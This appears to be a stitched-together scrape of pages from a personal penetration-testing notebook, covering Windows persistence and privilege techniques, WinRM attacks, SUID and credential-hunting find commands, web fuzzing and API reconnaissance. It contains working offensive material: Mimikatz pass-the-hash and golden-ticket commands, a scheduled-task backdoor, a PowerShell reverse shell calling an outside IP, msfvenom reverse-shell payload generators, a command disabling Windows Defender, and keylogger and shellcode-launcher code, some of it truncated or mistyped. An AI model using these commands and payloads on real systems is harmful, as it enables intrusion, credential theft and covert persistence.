New-ScheduledTaskSettingsSet` `PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S` `PS C:\> Register-ScheduledTask Backdoor -InputObject $D` **Maintaining Privilege** `# Steal passwords and use them with runas` `runas /netonly /user:FS01\Administrator cmd` `# If you can’t get passwords, use NTLM hashes with techniques such as Pass-the-Hash or psexec.` `# Both domain accounts and local accounts can work.` `mimikatz> sekurlsa::pth /user:Administrator /domain:FS01 /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt` `# Adding new local users can be a method to get back into machines` `# Administrators local group is a solution, but you can also use the following groups` `Remote Desktop Users` `Remote Management Users` `Backup Operators` `# With the NTLM hash of a computer account, silver tickets can be used to regain local admin privileges via the CIFS service.` `mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /target:fs01 /rc4:47b1d9d581f29b3b43845692bd4a0322 /service:cifs /ptt` `# Golden tickets can be used to forge access to any service in the domain.` `mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /rc4:9063b8edb3d04ed734edd49e5b0adef3 /ptt` [PreviousXML External Entity (XXE) Injection Payloadschevron-left](https://morgan-bin-bash.gitbook.io/pentesting/xml-external-entity-xxe-injection-payloads) [NextHashcat Cheatsheetchevron-right](https://morgan-bin-bash.gitbook.io/pentesting/hashcat-cheatsheet) Last updated 2 years ago --- # WinRM (Windows Remote Management) Pentesting | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting#enumeration) [Enumerationarrow-up-right](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#enumeration) #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting#brute-force-credentials) [Brute Force Credentialsarrow-up-right](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#brute-force-credentials) Copy # CrackMapExec poetry run crackmapexec winrm -d DomainName -u usernames.txt -p passwords.txt # Metasploit msfconsole msf > use auxiliary/scanner/winrm/winrm_login Copied! ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting#evil-winrm) [Evil-WinRMarrow-up-right](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#evil-winrm) [**Evil-WinRM**arrow-up-right](https://github.com/Hackplayers/evil-winrm) is a Windows Remote Management shell for pentesting. Below are list of commands for each situation. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting#connect) [Connectarrow-up-right](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#connect) Copy evil-winrm -i -u username -p password # -P: Specifify port evil-winrm -i -P 5986 -u username -p password # Pass The Hash (-H) evil-winrm -i -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc # PowerShell Local Path (-s) evil-winrm -i -u username -p password -s /opt/scripts # SSL enabled (-S) evil-winrm -i -u username -p password -S Copied! If you have private key and public key, you can use them for authentication. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting#commands) [Commandsarrow-up-right](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#commands) After connecting, we can use a lot of useful commands to exploit. Note that **we need to specify the absolute path for uploading and downloading.** ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting#crackmapexec) [CrackMapExecarrow-up-right](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#crackmapexec) [**CrackMapExec**arrow-up-right](https://github.com/byt3bl33d3r/CrackMapExec) is a swiss army knife for pentesting networks. The official docs says that it's recommended to use it via **Poetry** which is a Python package manager. First off, move to the directory in which the CrackMapExec installed and run **poetry install**. Then execute with **poetry run**. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting#omigod-cve-2021-38647) [OMIGOD (CVE-2021-38647)arrow-up-right](https://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/#omigod-(cve-2021-38647)) Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE). There are many PoC available, for instance: * [https://github.com/AlteredSecurity/CVE-2021-38647arrow-up-right](https://github.com/AlteredSecurity/CVE-2021-38647) * [https://github.com/horizon3ai/CVE-2021-38647arrow-up-right](https://github.com/horizon3ai/CVE-2021-38647) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting#references) References * [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647arrow-up-right](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647) **Tools by HDKS** [Fuzzagotchiarrow-up-right](https://github.com/hideckies/fuzzagotchi) Automatic web fuzzer. [aut0rec0narrow-up-right](https://github.com/hideckies/aut0rec0n) Auto reconnaissance CLI. [Hash Crackerarrow-up-right](https://hash-cracker.hdks.org/) Hash identifier. [Disclaimerarrow-up-right](https://exploit-notes.hdks.org/disclaimer) [Privacy Policyarrow-up-right](https://exploit-notes.hdks.org/privacy-policy) [PreviousWordlists & co.chevron-left](https://morgan-bin-bash.gitbook.io/pentesting/wordlists-and-co.) [NextAPI windowschevron-right](https://morgan-bin-bash.gitbook.io/pentesting/api-windows) Last updated 2 years ago * [Enumeration](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting#enumeration) * [Evil-WinRM](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting#evil-winrm) * [CrackMapExec](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting#crackmapexec) * [OMIGOD (CVE-2021-38647)](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting#omigod-cve-2021-38647) * [References](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting#references) Copy # -S: SSL # -k: private key # -c: public key evil-winrm -i -S -k private.key -c public.key Copied! Copy # Upload a local file to Windows machine PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat # Download a file to local PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt # List all services PS> services Copied! Copy cd crackmapexec poetry install Copied! Copy # Login and CMD execution (-x) poetry run crackmapexec winrm -d DomainName -u username -p password -x 'whoami' # Login and PowerShell execution (-X) poetry run crackmapexec winrm -d DomainName -u username -p password -X '$PSVersionTable' # Pass the Hash and CMD execution (-x) poetry run crackmapexec winrm -d DomainName -u username -H -x 'whoami' # Pass the Hash and PowerShell execution (-X) poetry run crackmapexec winrm -d DomainName -u username -H -X '$PSVersionTable' Copied! --- # Command find priv /esc | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) Vc pode usar o comando find para procurar arquivos com o bit SUID definido em todo o sistema de arquivos: **find / -user root -perm -4000 -print 2>/dev/null** **find / -perm -4000 -user root 2>/dev/null** _**find / -perm -u=s -type f 2>/dev/null**_ sudo find / -type f | grep -i "arquivo" 2>/dev/null sudo find / -perm -4755 2>/dev/null find / -perm -4000 -type f find / -type f -perm -04000 -ls 2>/dev/null find / -type f -name root.txt 2>/dev/null find / -type f -name user.txt 2>/dev/null **1 - Procura simples** find . -name arquivo.txt ./arquivo.txt **2 - Procura ignorando case sensitive** find /home/ -iname arquivo.txt ./arquivo.txt ./Arquivo.txt **3 - Procura dir** find / -type -d -name Fotos arquivo.txt /home/user/Fotos **4 - Procura com coringas** find /home/ -name \*rquivo\* ./home/arquivo.txt ./home/Arquivo.txt ./home/Meus\_Arquivo-NOVOS.txt ./home/arquivo.sh **5 - Procura por tipo de arquivos** find / -type -f -name Fotos \*.odt ./arquivo.odt ./terminalroot.odt **6 - Procura por permissão e encontra todos os arquivos que possuem permissão 777** find . -type f -perm 0777 -print **7 - Procura diferente de permissão encontra todos arquivos que não possuem a permissão 777** find / -type f ! -perm 777 **8 - Procura arquivos os diretórios vazis sem dizer se é -type d ou -type f ele procura ambos** find MinhaPasta/ -empty MinhaPasta/DirVazio MinhaPasta/arquivoVazio.txt • -type d procura só diretórios find MinhaPasta/ -type d -empty MinhaPasta/DirVazio ◇ -type f procura só arquivos find MinhaPasta/ -type f -empty MinhaPasta/arquivoVazio.txt **9 - Procura pastas ocultas** find /tmp -type f -name ".\*" **10 - Procura por tamanho vai encontrar todos os arquivos maiores que 10 MB** find . -type f -size +10MVai encontrar todos os arquivos menores que 10 MB find . -type f -size -10M **11 - Procura e remove com -exec** find . -type f -name arquivoVazio.txt -exec rm -f {} \\;Ou com xargs find . -type f -name arquivoVazio.txt | xargs rm -f **12 - Procura por nome dentro do arquivo** find MeusArquivos/ -name "\*.\*" -exec grep -Hin "Anomalias" {} \\; MeusArquivos/arquivo.txt:1:Anomalias **13 - Procura arquivos ACESSADOS (atime) nas últimas 24 horas (para mais de 3 dias , use +3)** find . -type f -atime -1 -exec ls -l {} \\; **14 - Procura arquivos ACESSADOS (amin) nos últimos 5 minutos** find . -type f -amin -5 **15 - Procura arquivos CRIADOS (ctime) nas últimas 12 horas** find . -type f -ctime -0.5 -exec ls -l {} \\; **16 - Procura arquivos MODIFICADOS (mtime) nas últimas 6 horas** find . -type f -mtime -0.25 **17 - Procura arquivos do tipo Sticky Bit com permissão 551** find / -perm 1551 **18 - Procura arquivos SUID** find / -perm /u=s 19 - Procura arquivos SGID find / -perm /g+s **20 - Procura arquivos executáveis** find / -perm /a=xou só para Leitura find / -perm /u=rExistem mais possibilidades, você pode ver todas no manual do comando: man find **1) Localizar arquivos e diretórios graváveis**: durante a escalação de privilégios, localizar arquivos e diretórios graváveis pode ser útil, pois pode permitir a execução de código arbitrário ou a modificação de arquivos importantes do sistema. O seguinte comando pode ser usado para localizar todos os arquivos e diretórios graváveis dentro do diretório raiz: **find / -writable -type d 2>/dev/null** **2) Encontrando binários SUID/SGID**: Os binários SUID/SGID são programas executados com as permissões de seu proprietário ou grupo, respectivamente, que podem levar à escalação de privilégios se não forem configurados corretamente. O seguinte comando pode ser usado para encontrar binários SUID/SGID no sistema: **find / -type f -perm /6000 2>/dev/null** **3) Encontrando arquivos legíveis** pelo mundo: Arquivos legíveis pelo mundo são arquivos que podem ser lidos por qualquer usuário no sistema, o que pode levar à exibição de informações eficazes. O seguinte comando pode ser usado para encontrar todos os arquivos legíveis pelo mundo: **find / -type f -perm /o+r 2>/dev/null** **4) Encontrando arquivos e diretórios ocultos**: arquivos e diretórios ocultos podem conter informações confidenciais ou configurações que podem ser aproveitadas para escalonamento de privilégios. O seguinte comando pode ser usado para localizar todos os arquivos e diretórios ocultos no diretório raiz: **find / -name ".\*" -type d -maxdepth 1 -exec ls -ald {} +** **5) Finding passwords and credentials**: Passwords and credentials may be stored in configuration files or other sensitive locations on the system. The following command can be used to search for files containing keywords such as "password" or "credential": **find / -type f -name "\*.conf" -exec grep -iE 'password=|pass=|pwd=|credentials=' {} +** **6) Encontrar arquivos confidenciais**: arquivos confidenciais podem ser armazenados em locais não padrão ou com permissões não padrão. O seguinte comando pode ser usado para procurar arquivos com permissões específicas: **find / -type f -perm /4000 -o -perm /2000 -exec ls -ald {} +** [PreviousAPI windowschevron-left](https://morgan-bin-bash.gitbook.io/pentesting/api-windows) [NextCrawl/Fuzzchevron-right](https://morgan-bin-bash.gitbook.io/pentesting/crawl-fuzz) Last updated 2 years ago --- # Crawl/Fuzz | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) **\# Crawlers** dirhunt [https://url.com/arrow-up-right](https://url.com/) hakrawler -domain [https://url.com/arrow-up-right](https://url.com/) python3 sourcewolf.py -h gospider -s "[https://example.com/"arrow-up-right](https://example.com/) -o output -c 10 -d 1 gospider -S sites.txt -o output -c 10 -d 1 gospider -s "[https://example.com/"arrow-up-right](https://example.com/) -o output -c 10 -d 1 --other-source --include-subs **\# Fuzzers** **\# ffuf** **\# Discover content** ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w six2dez/OneListForAll/onelistforall.txt -u [https://url.com/FUZZarrow-up-right](https://url.com/FUZZ) **\# Headers discover** ffuf -mc all -ac -u [https://hackxor.netarrow-up-right](https://hackxor.net/) -w six2dez/OneListForAll/onelistforall.txt -c -H "FUZZ: Hellothereheadertesting123 asd" **\# Ffuf - burp** ffuf -replay-proxy http:127.0.0.1:8080 **\# Fuzzing extensions** **\# General** .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml,.inc **\# Backups** '.bak','.bac','.old','.000','.~','.01','.\_bak','.001','.inc','.Xxx' **\# kr** # [https://github.com/assetnote/kiterunnerarrow-up-right](https://github.com/assetnote/kiterunner) kr brute [https://whatever.com/arrow-up-right](https://whatever.com/) -w onelistforallmicro.txt -x 100 --fail-status-codes 404 kr scan [https://whatever.com/arrow-up-right](https://whatever.com/) -w routes-small.kite -A=apiroutes-210228 -x 100 --ignore-length=34 **\# chameleon** # [https://github.com/iustin24/chameleonarrow-up-right](https://github.com/iustin24/chameleon) ./chameleon -u [http://testphp.vulnweb.comarrow-up-right](http://testphp.vulnweb.com/) -a -A **\# Best wordlists for fuzzing:** # [https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Contentarrow-up-right](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content) - raft-large-directories-lowercase.txt - directory-list-2.3-medium.txt - RobotsDisallowed/top10000.txt # [https://github.com/assetnote/commonspeak2-wordlists/tree/master/wordswithextarrow-up-right](https://github.com/assetnote/commonspeak2-wordlists/tree/master/wordswithext) - # [https://github.com/random-robbie/bruteforce-listsarrow-up-right](https://github.com/random-robbie/bruteforce-lists) # [https://github.com/google/fuzzing/tree/master/dictionariesarrow-up-right](https://github.com/google/fuzzing/tree/master/dictionaries) # [https://github.com/six2dez/OneListForAllarrow-up-right](https://github.com/six2dez/OneListForAll) # AIO: [https://github.com/foospidy/payloadsarrow-up-right](https://github.com/foospidy/payloads) # Check [https://wordlists.assetnote.io/arrow-up-right](https://wordlists.assetnote.io/) # Pro tip: set "Host: localhost" as header **\# Custom generated dictionary** gau example.com | unfurl -u paths **\# Get files only** sed 's#/#\\n#g' paths.txt |sort -u **\# Other things** gau example.com | unfurl -u keys gau example.com | head -n 1000 |fff -s 200 -s 404 **\# Hadrware devices admin panel** # [https://github.com/InfosecMatter/default-http-login-hunterarrow-up-right](https://github.com/InfosecMatter/default-http-login-hunter) default-http-login-hunter.sh [https://10.10.0.1:443/arrow-up-right](https://10.10.0.1/) **\# Dirsearch** dirsearch -r -f -u [https://10.11.1.111arrow-up-right](https://10.11.1.111/) --extensions=htm,html,asp,aspx,txt -w six2dez/OneListForAll/onelistforall.txt --request-by-hostname -t 40 **\# dirb** dirb [http://10.11.1.111arrow-up-right](http://10.11.1.111/) -r -o dirb-10.11.1.111.txt **\# wfuzz** wfuzz -c -z file,six2dez/OneListForAll/onelistforall.txt --hc 404 [http://10.11.1.11/FUZZarrow-up-right](http://10.11.1.11/FUZZ) **\# gobuster** gobuster dir -u [http://10.11.1.111arrow-up-right](http://10.11.1.111/) -w six2dez/OneListForAll/onelistforall.txt -s '200,204,301,302,307,403,500' -e **\# Cansina** # [https://github.com/deibit/cansinaarrow-up-right](https://github.com/deibit/cansina) python3 cansina.py -u example.com -p PAYLOAD **\# Ger endpoints from JS** **\# LinkFinder** # [https://github.com/GerbenJavado/LinkFinderarrow-up-right](https://github.com/GerbenJavado/LinkFinder) python linkfinder.py -i [https://example.comarrow-up-right](https://example.com/) -d python linkfinder.py -i burpfile -b **\# JS enumeration** # [https://github.com/KathanP19/JSFScan.sharrow-up-right](https://github.com/KathanP19/JSFScan.sh) **\# Tip, if 429 add one of these headers:** Client-Ip: IP X-Client-Ip: IP X-Forwarded-For: IP X-Forwarded-For: 127.0.0.1 [PreviousCommand find priv /escchevron-left](https://morgan-bin-bash.gitbook.io/pentesting/command-find-priv-esc) [NextHTTP Request Smugglingchevron-right](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling) Last updated 2 years ago --- # API Recon | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252FWCFtacSCMYrIeEDYyj6E%252FF-PQ6QhWwAAvJIx.jpeg%3Falt%3Dmedia%26token%3Df6d3b26e-b233-4977-9605-bb9f4074fa0e&width=1248&dpr=3&quality=100&sign=9cef98d0&sv=2) [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#summary-of-api-security-reconnaissance) Summary of API Security - Reconnaissance ------------------------------------------------------------------------------------------------------------------------------------------------------- ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#api-reconnaissance) API Reconnaissance #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#directory-and-subdomain-analysis) Directory and Subdomain Analysis * Look for API indicators in directory names like `/api`, `/api/v1`, `/v1`, `/v2`, `/v3`, `/rest`, `/swagger`, `/swagger.json`, `/doc`, `/docs`, `/graphql`, `/graphiql`, `/altair`, `/playground`. * Subdomains like `api.target-name.com`, `uat.target-name.com`, `dev.target-name.com`, `developer.target-name.com`, `test.target-name.com` can indicate web APIs. * Monitor HTTP Responses for statements like `{"message": "Missing Authorization token"}`. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#third-party-sources) Third-Party Sources * Leverage third-party sources like GitHub, Postman Explore, ProgrammableWeb API Directory, APIs Guru, Public APIs GitHub Project, and RapidAPI Hub for information on APIs. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#passive-reconnaissance) Passive Reconnaissance #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#google-dorking) Google Dorking * Utilize Google Dorking with queries such as inurl:"/wp-json/wp/v2/users" and intitle:"index.of" intext:"api.txt" to find publicly available API directories and key files. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#gitdorking) GitDorking * Search for files like `swagger.json` using GitDorking, and employ tools like Trufflehog for additional security checks. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#shodan) Shodan * Use Shodan queries like `hostname:"targetname.com"` and `"content-type: application/json"` to identify APIs based on domain and content type. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#the-wayback-machine) The Wayback Machine * Employ The Wayback Machine to explore historical changes in API documentation, uncovering potential Zombie APIs and aiding in testing for Improper Assets Management. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#active-reconnaissance) Active Reconnaissance #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#nmap) Nmap * Use Nmap for active API reconnaissance with commands like `nmap -sC -sV [target address or network range] -oA nameofoutput`. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#owasp-amass) OWASP Amass * Employ OWASP Amass for active enumeration of APIs, creating a configuration file for API keys, and using commands like `amass enum -active -d target-name.com | grep api`. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#directory-brute-force-with-gobuster) Directory Brute-force with Gobuster * Use Gobuster for directory brute-force with a command like `gobuster dir -u://targetaddress/ -w /usr/share/wordlists/api_list/common_apis_160 -x 200,202,301 -b 302`. #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#kiterunner) Kiterunner * Utilize Kiterunner for discovering API endpoints and resources with commands like `kr scan HTTP://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite` and `kr brute -w ~/api/wordlists/data/automated/nameofwordlist.txt`. [PreviousShells & Payloadschevron-left](https://morgan-bin-bash.gitbook.io/pentesting/shells-and-payloads) [NextAPI Token Attackschevron-right](https://morgan-bin-bash.gitbook.io/pentesting/api-token-attacks) Last updated 2 years ago * [Summary of API Security - Reconnaissance](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#summary-of-api-security-reconnaissance) * [API Reconnaissance](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#api-reconnaissance) * [Passive Reconnaissance](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#passive-reconnaissance) * [Active Reconnaissance](https://morgan-bin-bash.gitbook.io/pentesting/api-recon#active-reconnaissance) --- # Shells & Payloads | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fw3pUjZM0Pyz0PGfrcuan%252FGChAl92XgAAMKsO.jpeg%3Falt%3Dmedia%26token%3D9ec40a0f-5d12-46bc-b4f3-c50d4d13d451&width=1248&dpr=3&quality=100&sign=b8a767fb&sv=2) Commands Description `xfreerdp /v:10.129.x.x /u:htb-student /p:HTB_@cademy_stdnt!` CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol `env` Works with many different command language interpreters to discover the environmental variables of a system. This is a great way to find out which shell language is in use `sudo nc -lvnp ` Starts a netcat listener on a specified port `nc -nv :` Connects to a netcat listener at the specified IP address and port \`rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f /bin/bash -i 2>&1 \`powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();\[byte\[\]\]$bytes = 0..65535 %{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 `Set-MpPreference -DisableRealtimeMonitoring $true` Powershell command used to disable real-time monitoring in Windows Defender `use exploit/windows/smb/psexec` Metasploit exploit module that can be used on a vulnerable Windows system to establish a shell session utilizing smb & psexec `shell` Command used in a meterpreter shell session to drop into a system shell `msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf` MSFvenom command used to generate a Linux-based reverse shell stageless payload `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > nameoffile.exe` MSFvenom command used to generate a Windows-based reverse shell stageless payload `msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho` MSFvenom command used to generate a MacOS-based reverse shell payload `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp` MSFvenom command used to generate an ASP web reverse shell payload `msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp` MSFvenom command used to generate a JSP web reverse shell payload `msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war` MSFvenom command used to generate a WAR java/jsp compatible web reverse shell payload `use auxiliary/scanner/smb/smb_ms17_010` Metasploit exploit module used to check if a host is vulnerable to ms17\_010 `use exploit/windows/smb/ms17_010_psexec` Metasploit exploit module used to gain a reverse shell session on a Windows-based system that is vulnerable to ms17\_010 `use exploit/linux/http/rconfig_vendors_auth_file_upload_rce` Metasploit exploit module that can be used to obtain a reverse shell on a vulnerable Linux system hosting rConfig 3.9.6 `python -c 'import pty; pty.spawn("/bin/sh")'` Python command used to spawn an interactive shell on a Linux-based system `/bin/sh -i` Spawns an interactive shell on a Linux-based system `perl —e 'exec "/bin/sh";'` Uses Perl to spawn an interactive shell on a Linux-based system `ruby: exec "/bin/sh"` Uses Ruby to spawn an interactive shell on a Linux-based system `Lua: os.execute('/bin/sh')` Uses Lua to spawn an interactive shell on a Linux-based system `awk 'BEGIN {system("/bin/sh")}'` Uses AWK command to spawn an interactive shell on a Linux-based system `find / -name nameoffile 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \;` Uses Find command to spawn an interactive shell on a Linux-based system `find . -exec /bin/sh \; -quit` An alternative way to use the Find command to spawn an interactive shell on a Linux-based system `vim -c ':!/bin/sh'` Uses the text-editor VIM to spawn an interactive shell. Can be used to escape "jail-shells" `ls -la ` Used to list files & directories on a Linux-based system and shows the permission for each file in the chosen directory. Can be used to look for binaries that we have permission to execute `sudo -l` Displays the commands that the currently logged on user can run as sudo `/usr/share/webshells/laudanum` Location of laudanum webshells on ParrotOS and Pwnbox `/usr/share/nishang/Antak-WebShell` Location of Antak-Webshell on Parrot OS and Pwnbox [PreviousPivoting, Tunneling, and Port Forwardingchevron-left](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding) [NextAPI Reconchevron-right](https://morgan-bin-bash.gitbook.io/pentesting/api-recon) Last updated 2 years ago --- # API windows | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-windows#online-tools) [Online Toolsarrow-up-right](https://exploit-notes.hdks.org/exploit/windows/windows-api/#online-tools) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-windows#online-tools-1) [https://malapi.io/arrow-up-right](https://malapi.io/) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-windows#keylogger) [Keyloggerarrow-up-right](https://exploit-notes.hdks.org/exploit/windows/windows-api/#keylogger) Copy class Keylogger { [DllImport("user32.dll" CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreaded); [DllImport("user32.dll", CharSet = CharSet.auto, SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool UnhookWindowsHookEx(IntPtr hhk); [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr GetModuleHandle(string lpModuleName); private static int WHKEYBOARDLL = 13; [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr GetCurrentProcess(); public static void Main() { _hookID = SetHook(_proc); Application.Run(); UnhookWindowsHookEx(_hookID); Application.Exit(); } private static IntPtr SetHook(LowLevelKeyboardProc proc) { using (Process curProcess = Process.GetCurrentProcess()) { return SetWindowsHookEx(WHKEYBOARDLL, proc, GetModuleHandle(curProcess.ProcessName), 0); } } } Copied! ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-windows#shellcode-launcher) [Shellcode Launcherarrow-up-right](https://exploit-notes.hdks.org/exploit/windows/windows-api/#shellcode-launcher) [PreviousWinRM (Windows Remote Management) Pentestingchevron-left](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting) [NextCommand find priv /escchevron-right](https://morgan-bin-bash.gitbook.io/pentesting/command-find-priv-esc) Last updated 2 years ago * [Online Tools](https://morgan-bin-bash.gitbook.io/pentesting/api-windows#online-tools) * [https://malapi.io/](https://morgan-bin-bash.gitbook.io/pentesting/api-windows#online-tools-1) * [Keylogger](https://morgan-bin-bash.gitbook.io/pentesting/api-windows#keylogger) * [Shellcode Launcher](https://morgan-bin-bash.gitbook.io/pentesting/api-windows#shellcode-launcher) Copy class ShellcodeLauncher { private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); } Copied! Copy UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXEUCTE_READWRITE); Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); IntPtr hThread = IntPtr.Zero; UInt32 